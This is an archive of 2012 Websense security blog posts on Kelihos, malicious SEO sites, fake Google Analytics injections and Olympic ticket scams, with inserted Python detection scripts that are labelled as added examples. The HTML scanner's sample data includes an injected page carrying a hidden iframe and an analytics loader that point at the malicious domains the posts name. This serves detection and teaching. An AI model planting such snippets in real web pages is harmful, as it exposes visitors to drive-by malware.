
February 2012 Posts

Twitter To Reach 500 Million Users Any Minute Now?
Posted: 21 Feb 2012 02:39 PM

There have been reports from several sources that Twitter is fast approaching the milestone of 500 million users. We look at what that figure means and reflect on some of the issues that Twitter users have faced over the years.

 

What does that figure mean to us?

  • This number of Twitter users is 60% more than the population of the United States of America (according to the U.S. Census Bureau).
  • That figure is 8 times the population of the United Kingdom.
  • The approximate human population of Earth in 1550 AD was 500 million.

 

Of course, not all Twitter users are who they claim to be.

You are probably familiar with seeing a picture of an attractive individual gracing your follower list and then realizing that the follower is just trying to pass off suspect medication. The abuse of Twitter by spammers and bot networks is nothing new and something we have seen in Websense® Security Labs™ for several years now. Over the past few years, we have seen bot networks take their instruction from generated Twitter users. We have also seen website compromises on a massive scale using Twitter trending topics to generate the malicious domain they contact next.

 

Malware authors and spammers jump on social networks in the hope that they can quickly spread their wares: 500 million users, 200 million users, even 100 million users provide the scale and network connectivity to do exactly this.

 

Here are some of the not-so-high Twitter highlights of the last 5 years:

 

Is there any hope?

Behind every cloud is a silver lining, and Twitter is no exception. Our Websense Social Web Controls, as well as our ThreatSeeker® Network, can help limit exposure to threats on social networks. You can find out more at www.websense.com

 

From bread bakers to candlestick makers, from celebrities to pharmacists, 500 million users/spammers/bots have turned to Twitter to share their lives and engage in 140-character exchanges with others. Have you?

 

Regards,

https://twitter.com/websenselabs

Filed under:

Carl Leonard

Long life to Kelihos!
Posted: 17 Feb 2012 01:51 AM

During the past months, the Kelihos spam botnet has attracted the attention of many people, including security company researchers and analysts. Also interesting was the recent official Microsoft response, which confirmed a new generation of Kelihos variants derived from the previous one. The Websense® Security Labs™ Spam Trap system has detected a variant of Kelihos that is apparently still active.

 

We focused our research on trying to uncover the Kelihos command and control infrastructure and P2P network, along with some features of the botnet that we could recognize, including enhancements. The first interesting thing we noticed was in a sample of the network traffic generated by the bot before it starts its spam activity. As shown below, the bot generates a first request to an IP address that is listening on HTTP port 80:

 

 

We detected encrypted traffic between the "infected" host and the IP addresses shown above. The server contacted by the bot answers with another encrypted network stream. Before the bot starts to generate spam, it contacts another IP address, this time with an HTTP GET request, as shown in the following screen shot:

 

 

In this screen shot, we see that the "User-Agent" header carries a dodgy user-agent string, and that the traffic exchanged between the bot and the contacted server for the requested URL appears to be encrypted. Our investigation found that the last stream received by the bot is the configuration that permits it to begin generating spam: the targeted countries, a list of recipients, a template for the email body, and a list of MX records needed to start the campaign.
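A practitioner hunting for this behaviour in proxy records would key on the same three things the post describes: a request to a bare IP address rather than a hostname, an unusual User-Agent, and a response served as a web page whose body is actually encrypted. The following script is an added example, not code from the original post or from Websense; its sample records, User-Agent allowlist and entropy threshold are constructed assumptions, and the "bot" record deliberately uses a made-up User-Agent string since the post does not reproduce the real one.

```python
"""Heuristic triage of HTTP records for Kelihos-style beacons.

Added example, not part of the original post.  The records, the User-Agent
allowlist and the entropy threshold are assumptions made for illustration.
"""
import hashlib
import ipaddress
import math
from dataclasses import dataclass
from typing import List

# Prefixes of User-Agent strings we treat as plausible browsers (assumption).
KNOWN_UA_PREFIXES = ("Mozilla/", "Opera/")
# Encrypted or compressed data sits close to 8 bits/byte; HTML sits near 4-5.
ENTROPY_THRESHOLD = 7.0


@dataclass
class HttpRecord:
    method: str
    host: str          # Host header or destination as logged by the proxy
    path: str
    user_agent: str
    content_type: str  # Content-Type of the response
    body: bytes        # response body as captured


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data`; 0.0 for empty input."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        return False


def triage(rec: HttpRecord) -> List[str]:
    """Return the indicators this record trips; an empty list means nothing odd."""
    reasons = []
    if is_ip_literal(rec.host):
        reasons.append("destination is a bare IP literal rather than a hostname")
    if not rec.user_agent.startswith(KNOWN_UA_PREFIXES):
        reasons.append(f"unusual User-Agent {rec.user_agent!r}")
    ent = shannon_entropy(rec.body)
    if rec.content_type.startswith("text/") and ent > ENTROPY_THRESHOLD:
        reasons.append(f"text/* response looks encrypted ({ent:.2f} bits/byte)")
    return reasons


def pseudo_random_bytes(n: int, seed: bytes = b"example-seed") -> bytes:
    """Deterministic high-entropy filler standing in for an encrypted stream."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed sample traffic: a normal page fetch and a bot-like exchange.
SAMPLE_RECORDS = [
    HttpRecord("GET", "www.example.com", "/index.html",
               "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0",
               "text/html", b"<html><body><h1>Hello, world</h1></body></html>"),
    HttpRecord("GET", "198.51.100.23", "/file.htm",
               "Download/1.0",                      # made-up odd User-Agent
               "text/html", pseudo_random_bytes(2048)),
]


def triage_all(records: List[HttpRecord]) -> dict:
    return {f"{r.method} {r.host}{r.path}": triage(r) for r in records}


if __name__ == "__main__":
    for key, reasons in triage_all(SAMPLE_RECORDS).items():
        print(("SUSPECT " if reasons else "ok      ") + key)
        for reason in reasons:
            print("          - " + reason)
```

None of the three indicators is conclusive on its own (software updaters fetch from IP literals, and gzip bodies are high-entropy too, which is why the entropy rule only fires on text/* responses); the point is that a Kelihos-style exchange trips all three at once, which is a much rarer combination in normal traffic.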

Static analysis of this binary (MD5 021EC96775A37AE92680C076295D5991) confirms that the new generation of Kelihos uses an encryption mechanism based on Blowfish. Using some of our tools of the trade, we reversed the binary and found evidence of a statically linked copy of the open-source cryptographic library Crypto++. Further investigation with a tool called PEiD provided the needed confirmation:

 

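The quickest static confirmation that a sample carries Blowfish is the one the PEiD screenshot represents: Blowfish initialises its P-array and S-boxes from the hexadecimal digits of pi, so those constants survive in any binary that links the cipher in, whether from Crypto++ or elsewhere. The script below is an added example, not Websense tooling; the "binary" it scans is constructed in memory, and the Crypto++ marker strings it looks for are an assumption rather than a documented fingerprint.

```python
"""Static check for a compiled-in Blowfish implementation.

Added example, not code from the post.  Blowfish's P-array starts with the
fractional hex digits of pi, so the first eight DWORDs are a reliable
fingerprint.  The sample "binary" is constructed in memory for illustration.
"""
import struct
from typing import List, Tuple

# First entries of the Blowfish P-array (fractional hex digits of pi).
BLOWFISH_P_ARRAY = (
    0x243F6A88, 0x85A308D3, 0x13198A2E, 0x03707344,
    0xA4093822, 0x299F31D0, 0x082EFA98, 0xEC4E6C89,
)
# First entry of Blowfish S-box 0, also taken from pi.
BLOWFISH_S0_FIRST = 0xD1310BA6

# Strings a statically linked Crypto++ may leave behind (assumption).
CRYPTOPP_MARKERS = (b"Crypto++", b"CryptoPP", b"Blowfish")


def _packed(words, fmt: str) -> bytes:
    return b"".join(struct.pack(fmt, w) for w in words)


def find_blowfish_constants(data: bytes) -> List[Tuple[int, str]]:
    """Offsets where the P-array prefix appears, with the byte order found.

    A compiler emits the table as native DWORDs (little-endian on x86); the
    big-endian search covers tables that were stored byte-wise instead.
    """
    hits = []
    for label, fmt in (("little-endian", "<I"), ("big-endian", ">I")):
        needle = _packed(BLOWFISH_P_ARRAY, fmt)
        pos = data.find(needle)
        while pos != -1:
            hits.append((pos, label))
            pos = data.find(needle, pos + 1)
    return hits


def find_library_markers(data: bytes) -> List[Tuple[int, bytes]]:
    return [(data.find(m), m) for m in CRYPTOPP_MARKERS if m in data]


def build_sample_binary() -> bytes:
    """Constructed stand-in for a PE section: filler, the tables, one marker string."""
    filler = bytes(range(256)) * 4                      # 1024 bytes of non-matching data
    p_table = _packed(BLOWFISH_P_ARRAY, "<I")
    s_box_start = struct.pack("<I", BLOWFISH_S0_FIRST)
    return filler + p_table + s_box_start + b"\x00" * 64 + b"CryptoPP\x00" + filler


def report(data: bytes) -> dict:
    tables = find_blowfish_constants(data)
    return {
        "blowfish_tables": tables,
        "library_markers": find_library_markers(data),
        "uses_blowfish": bool(tables),
    }


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_binary()
    for key, val in report(blob).items():
        print(f"{key}: {val}")
```

Run it against a real sample with the file path as the first argument. This is the same constant-matching that PEiD's crypto signature plugins perform; a hit tells you the cipher is present, not where the key comes from, which is what the reverse-engineering step that follows is for.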

This knowledge allowed us to start a more detailed investigation through reverse engineering. After observing that the first IP address contacted by the bot changed according to no apparent criterion, we set out to understand where that address was retrieved from. A straightforward search of a memory dump taken during the bot's runtime turned up nothing. A closer review of the memory contents, however, revealed that some "hard-coded" information in the bot was protected by an in-memory mechanism based on encoding and encryption. In other words, the vital parameters that allow this bot to exist were not easily detectable because they were located in an area of the code to which custom obfuscation had been applied. When we searched for IP addresses in memory, we identified the code routine used to decrypt them (probably all compromised hosts). What follows is a snippet from a memory dump taken after the decryption routine ran:

 

 

The above screen shot shows the area of the bot's memory after the decryption routine extracts the first IP address to contact. The bot then starts the network conversation shown in the traffic screen shot at the beginning of this post. We found a total of 499 IP addresses in the bot's memory. Extracting this list from the bot, we can (thanks to Google Maps) plot how widespread the Kelihos command and control and peer infrastructure is. The following illustration shows the geographical distribution of just 100 of those IP addresses, chosen randomly from the list. Given the number of locations shown, you can see how resilient this botnet's infrastructure is:
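Turning the decrypted memory region into the peer list and the per-country breakdown is routine once the decryption routine has run: carve whatever dotted-quad strings are present, decode the packed table at the offset the debugger showed, drop anything that is not globally routable, deduplicate, and aggregate. The script below is an added example, not Websense tooling. Its memory dump is constructed, the "peer" addresses in it are arbitrary public addresses and not real Kelihos peers, and the country assignments are a made-up table standing in for whatever GeoIP source you would plug in.

```python
"""Carve and summarise a bot's peer/C2 address list from a memory dump.

Added example, not the Websense tooling.  After the bot's decryption routine
runs, the addresses sit in memory either as dotted-quad text or as a packed
table of 4-byte values.  The dump, the peer addresses and the country table
below are all constructed for illustration.
"""
import ipaddress
import re
import struct
from collections import Counter
from typing import Callable, Dict, List, Optional

# Dotted quads not glued to other digits/dots (so "1.2.3.4.5" is not matched).
DOTTED_QUAD = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def plausible_peer(addr: ipaddress.IPv4Address) -> bool:
    """Keep only addresses a bot could actually reach over the internet."""
    return addr.is_global and not addr.is_multicast and not addr.is_reserved


def carve_text_addresses(dump: bytes) -> List[ipaddress.IPv4Address]:
    """Find dotted-quad strings anywhere in the dump and validate each one."""
    found = []
    for m in DOTTED_QUAD.finditer(dump):
        try:
            addr = ipaddress.IPv4Address(m.group(0).decode("ascii"))
        except ValueError:            # an octet above 255, e.g. "300.1.2.3"
            continue
        if plausible_peer(addr):
            found.append(addr)
    return found


def unpack_packed_table(dump: bytes, offset: int, count: int) -> List[ipaddress.IPv4Address]:
    """Decode `count` network-order (in_addr) entries starting at `offset`.

    Use this once the debugger has shown where the decrypted table lives; a
    blind scan for 4-byte values would match almost any data in the dump.
    """
    words = struct.unpack_from(f"!{count}I", dump, offset)
    return [ipaddress.IPv4Address(w) for w in words]


def dedupe(addrs) -> List[ipaddress.IPv4Address]:
    return sorted(set(addrs))


def top_countries(addrs, lookup: Callable[[ipaddress.IPv4Address], Optional[str]],
                  n: int = 20) -> List[tuple]:
    """Aggregate by country; `lookup` wraps whatever GeoIP source you have."""
    return Counter(lookup(a) or "??" for a in addrs).most_common(n)


# --- constructed sample dump ---------------------------------------------
PEERS_TEXT = [b"5.34.123.10", b"31.7.56.200", b"46.165.200.11", b"62.210.15.9", b"77.88.21.3"]
PEERS_PACKED = ["78.46.90.114", "79.174.66.10", "80.67.17.2", "5.34.123.10"]  # last duplicates a text entry
NOISE = b"\x00\x11\x22\x33 gate.php 192.168.1.5 300.1.2.3 10.0.0.7 1.2.3.4.5 "


def build_sample_dump() -> bytes:
    text_part = NOISE + b"\x00".join(PEERS_TEXT) + b"\x00"
    packed = b"".join(ipaddress.IPv4Address(p).packed for p in PEERS_PACKED)
    return text_part + packed + NOISE


PACKED_TABLE_OFFSET = len(NOISE) + len(b"\x00".join(PEERS_TEXT)) + 1

# Made-up country assignments standing in for a GeoIP database lookup.
FAKE_GEO: Dict[str, str] = {
    "5.34.123.10": "RU", "31.7.56.200": "DE", "46.165.200.11": "DE", "62.210.15.9": "FR",
    "77.88.21.3": "RU", "78.46.90.114": "DE", "79.174.66.10": "UA", "80.67.17.2": "FR",
}


def fake_lookup(addr: ipaddress.IPv4Address) -> Optional[str]:
    return FAKE_GEO.get(str(addr))


def analyse(dump: bytes, table_offset: int, table_count: int) -> dict:
    addrs = dedupe(carve_text_addresses(dump)
                   + unpack_packed_table(dump, table_offset, table_count))
    return {"addresses": [str(a) for a in addrs],
            "by_country": top_countries(addrs, fake_lookup)}


if __name__ == "__main__":
    result = analyse(build_sample_dump(), PACKED_TABLE_OFFSET, len(PEERS_PACKED))
    print(f"{len(result['addresses'])} unique peers")
    for cc, n in result["by_country"]:
        print(f"  {cc}: {n}")
```

The private, documentation-range and malformed addresses salted into the noise are dropped by the validation step, which matters in real dumps where the bot's own network configuration and random data are mixed in with the peer list.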

 

 

 

When we extracted the country code from the IP addresses, we generated the following graph, which shows the 20 countries that are home to most of the Kelihos command and control and peers systems:

 

 

 

More investigation of Kelihos spam activity revealed that this botnet is involved in several malicious campaigns, including the following phishing attempt:

 

 

 

Our Websense ThreatSeeker® network can detect this spam activity and block the communication between the Kelihos bot and its command and control and peers structure. The following screen shot shows how a Websense customer is protected against the phishing attempt shown in the mail above:

 

 

During our investigation, we also detected and trapped the following email messages generated by the Kelihos bot. We can see from this list that the campaign targets primarily European and US email addresses:

 

 

We could say much more about the Kelihos botnet. For example, the code seems to be derived from, and to recycle, Waledac variants or other closely related malicious code. We have also detected evidence of infostealer activity targeting well-known FTP clients, a routine that acts like a Bitcoin wallet stealer, and a list of suspicious User-Agent strings used by the bot to contact its command and control servers and other peers. The most important result of this analysis, however, is that we have retrieved the entire list of command and control systems.

 

Websense customers are protected from these threats by ACE™, our Advanced Classification Engine.

 

 

Filed under:

Gianluca Giuliani

Chocolate Covered Exploit?
Posted: 14 Feb 2012 12:10 AM

Valentine’s Day is here, and stores are flooded with flowers, chocolates, and gift cards. Showing appreciation to your significant other(s) with a box of expensive chocolates has become a tradition, but Googling to find the perfect gourmet chocolate gift has never been more dangerous.

 

Events such as Valentine’s Day are a prime target for many hackers. Because large numbers of people search using similar terms (in this case, “Valentine’s Day chocolates”), hackers who get their pages ranked for those terms can drive a lot of traffic to a site in a short period of time. Within the first three pages of results, you can stumble across an apparently harmless site that leads to exploits and malware with a catastrophic effect on the computer.

 

At first glance, the site below seems harmless. When we take a closer look at its source code, however, we see an interesting iframe.

 

 

The source code shows an iframe in the top left corner of the page.

 

On the surface, the source code of the URL http://bigdeal777.com/gate.php?f=956993 seems to have no content, but when we review the site using internal Websense mining tools, we find that it actually delivers an exploit kit that uses several client-side vulnerabilities to push malware onto the system.

 

Websense customers are protected from these threats by ACE™, our Advanced Classification Engine.

Injection code masquerades as Google Analytics
Posted: 07 Feb 2012 05:20 AM

The Websense® ThreatSeeker® Network has discovered a new wave of malicious code injection disguised as Google Analytics, using look-alike code snippets and malicious domains.

 

 

It is quite convincing at first glance, but remember that the analytics snippet usually sits at the bottom of the page rather than at the top, which is a good hint for webmasters. Another hint is the "UA-XXXXX-X" placeholder used as the "Google Analytics account"; that is obviously not what a real deployment does. We found other similar domains, such as google-analytics[dot]su, in this attack and will update once we find more. The evil ga.js code is shown below:

 


It is highly obfuscated and hard to read, but after all its tricks it finally redirects to the IP address 37.59.74.145, which hosts the Black Hole exploit kit.
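The two injections in this post and the preceding one (the hidden iframe to bigdeal777.com/gate.php and the fake Google Analytics snippet) are both things a webmaster can check for in the page source without any Websense tooling. The script below is an added example, not code from either post: it scans HTML for an iframe that points off-site and is tiny or pushed off-screen, and for an analytics snippet that uses the "UA-XXXXX-X" placeholder, references a google-analytics look-alike host, or sits in <head> rather than at the bottom of the page (the weakest of the hints). The two sample pages and the page hostname are constructed; the hostile domains in them are the ones named in the posts and are never fetched.

```python
"""Scan page HTML for injected iframes and fake Google Analytics snippets.

Added example for webmasters, not code from the original posts.  The sample
pages and the page host are constructed; bigdeal777.com and
google-analytics.su are the domains named in the posts and are only
inspected as strings here, never contacted.
"""
import re
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse

LEGIT_GA_HOSTS = {"google-analytics.com", "www.google-analytics.com", "ssl.google-analytics.com"}
GA_ACCOUNT = re.compile(r"UA-([0-9A-Za-z]+)-([0-9A-Za-z]+)")     # real accounts are all digits
GA_HOST = re.compile(r"[a-z0-9.-]*google-analytics\.[a-z]+", re.I)


class InjectionScanner(HTMLParser):
    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings: List[str] = []
        self.in_head = False
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "head":
            self.in_head = True
        elif tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self.in_script = True
            if a.get("src"):
                self._check_ga_host(a["src"])

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False
        elif tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # HTMLParser hands over <script> bodies verbatim, so inline snippets land here.
        if not self.in_script:
            return
        for m in GA_ACCOUNT.finditer(data):
            if not (m.group(1).isdigit() and m.group(2).isdigit()):
                self.findings.append(f"placeholder analytics account {m.group(0)}")
        for m in GA_HOST.finditer(data):
            self._check_ga_host(m.group(0))
        if self.in_head and ("_gaq" in data or "google-analytics" in data):
            self.findings.append("analytics snippet placed in <head> (weak hint; usually at the bottom)")

    def _check_ga_host(self, src_or_host: str):
        host = (urlparse(src_or_host).netloc or src_or_host).lower().lstrip(".")
        if "google-analytics" in host and host not in LEGIT_GA_HOSTS:
            self.findings.append(f"analytics script referenced from look-alike host {host}")

    @staticmethod
    def _dim(value: str) -> int:
        m = re.match(r"\d+", value)
        return int(m.group(0)) if m else 10**6      # missing dimension: treat as large

    def _check_iframe(self, a):
        src = a.get("src", "")
        host = urlparse(src).netloc.lower()
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (self._dim(a.get("width", "")) <= 1 or self._dim(a.get("height", "")) <= 1
                  or "display:none" in style or "visibility:hidden" in style
                  or re.search(r"(top|left):-\d", style) is not None)
        if host and host != self.page_host:
            self.findings.append(f"iframe to third-party host {host}" + (" (hidden)" if hidden else ""))
        elif hidden:
            self.findings.append(f"hidden iframe {src or '(no src)'}")


def scan_page(html: str, page_host: str) -> List[str]:
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages: a clean shop page and the same page after injection.
BENIGN_PAGE = """<html><head><title>Shop</title></head><body><h1>Gourmet chocolates</h1>
<script type="text/javascript">
var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-1234567-1']); _gaq.push(['_trackPageview']);
(function() { var ga = document.createElement('script'); ga.async = true;
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();
</script></body></html>"""

INJECTED_PAGE = """<html><head><title>Shop</title>
<script type="text/javascript">
var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-XXXXX-X']); _gaq.push(['_trackPageview']);
(function() { var ga = document.createElement('script'); ga.async = true;
  ga.src = 'http://google-analytics.su/ga.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();
</script></head><body>
<iframe src="http://bigdeal777.com/gate.php?f=956993" width="1" height="1" style="position:absolute;top:-999px;left:-999px"></iframe>
<h1>Gourmet chocolates</h1></body></html>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_page(page, "www.example-chocolates.com") or ["no findings"])
```

The placeholder-account and look-alike-host checks are the strong signals; the iframe check needs the size and positioning hints because legitimate pages embed third-party frames too, and the <head> placement is reported only as a hint, exactly as the post treats it.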

 

 

  

Websense customers are protected from these threats by ACE™, our Advanced Classification Engine.

Buyers beware—of Olympic scams
Posted: 01 Feb 2012 07:06 PM

Shady ticket deals for the 2012 London Olympics? Hardly surprising. But when the source is Google's famous AdWords advertising service, one of the internet giant's main sources of income, then a double take might be in order.

 

A BBC investigation found that a Google search for "olympic tickets" resulted in top-of-the-page placement of sponsored sites for vendors selling tickets without permission from Olympic authorities, which is a criminal offense in the U.K. under the London Olympic Games and Paralympic Games Act 2006.

 

Our research confirmed that the Google search shown below displays an AdWords link

 

 

 

that is not authorized to sell Olympic tickets according to the ticketing website checker on the official London Olympics website.

 

 

The prominent display of sponsored ads tends to confer on them a sense of legitimacy. Users may assume that Google has approved the businesses, or at least stands behind them in some way. But in response to a complaint from a would-be Olympic ticket purchaser, Google said, "While Google AdWords provides a platform for companies to advertise their services, we are not responsible for, nor are we able to monitor the actions of each company."

 

The inner workings of AdWords are complex and opaque. These qualities are essential, because if Google revealed its algorithms, for example, people could easily cheat their way to the top. While the automated system does take into account something called "Quality Score" and consumer ratings, it's clearly not foolproof. A filtering system flags certain keywords for manual review and removal if the ad is found to violate Google's policies, and users can also fill out an online complaint form. Due to the volume of ads, however, a questionable ad may be up for some time before it is reviewed.

 

Websense® researchers investigated some of the Olympic ticket scam sites. We found that most of them had multiple backlinks, suggesting they have been widely spammed across the internet in addition to being promoted via Google AdWords. A "backlink" is a hyperlink that points to a specific web page. Both legitimate web pages and spam URLs often try to set up as many backlinks as possible to drive traffic to their sites, and the number of backlinks a site has may affect its ranking in search engine results. Like the hyperlinks in this post, links can be used to provide additional context, information, or examples.

 

An examination of these backlinks confirmed that "birds of a [bad] feather flock together." One URL yielded 500 backlinking URLs in categories such as Adult Material, Gambling, Proxy Avoidance, Potentially Unwanted Software, Suspicious Embedded Links, and Malicious Embedded Links.

 

A set of 375 backlinks for another URL found that 104 (27.73%) included various kinds of objectionable content, including security risks (the remaining URLs either had no backlinks or had backlinks for legitimate sites such as News and Media, Business and Economy, and so on).  The breakdown for objectionable/security risk backlinks was as follows:

 

 

A closer look at just one of the backlinks tells us a lot about the dangers of allowing unmoderated comments on any site. In this case, a perfectly legitimate website for a church posted a video of a Sunday School Christmas play and invited viewers to comment:

 

 

Viewers and spammers did exactly that, adding links not only to the Olympic ticket scam we started with, but also to a variety of other completely unrelated businesses which may or may not be legitimate, including German gambling and phone sex sites and an Italian "escort" agency:

 

 

 

 

Defensio from Websense is one way to prevent spammers from posting such links on blogs and other social media, including Facebook pages. With this service, it's easy to block and manage comments, protecting you and your followers from comment spam, malware, and other threats embedded in user-generated content.

 

With Google searches as with everything else, do your own "due diligence" before making a transaction, even if the business is at the top of the page. In the case of London Olympics tickets, the official website includes the handy ticketing website checker that we used to determine if a URL is recognized as an authorized vendor. There's also a page about staying safe online, which includes a long list of known scams that will only get longer as the July 27 opening day approaches.

 

Websense customers are protected from these threats by ACE™, our Advanced Classification Engine.

Filed under:

RM

©2013 Websense, Inc. All Rights Reserved.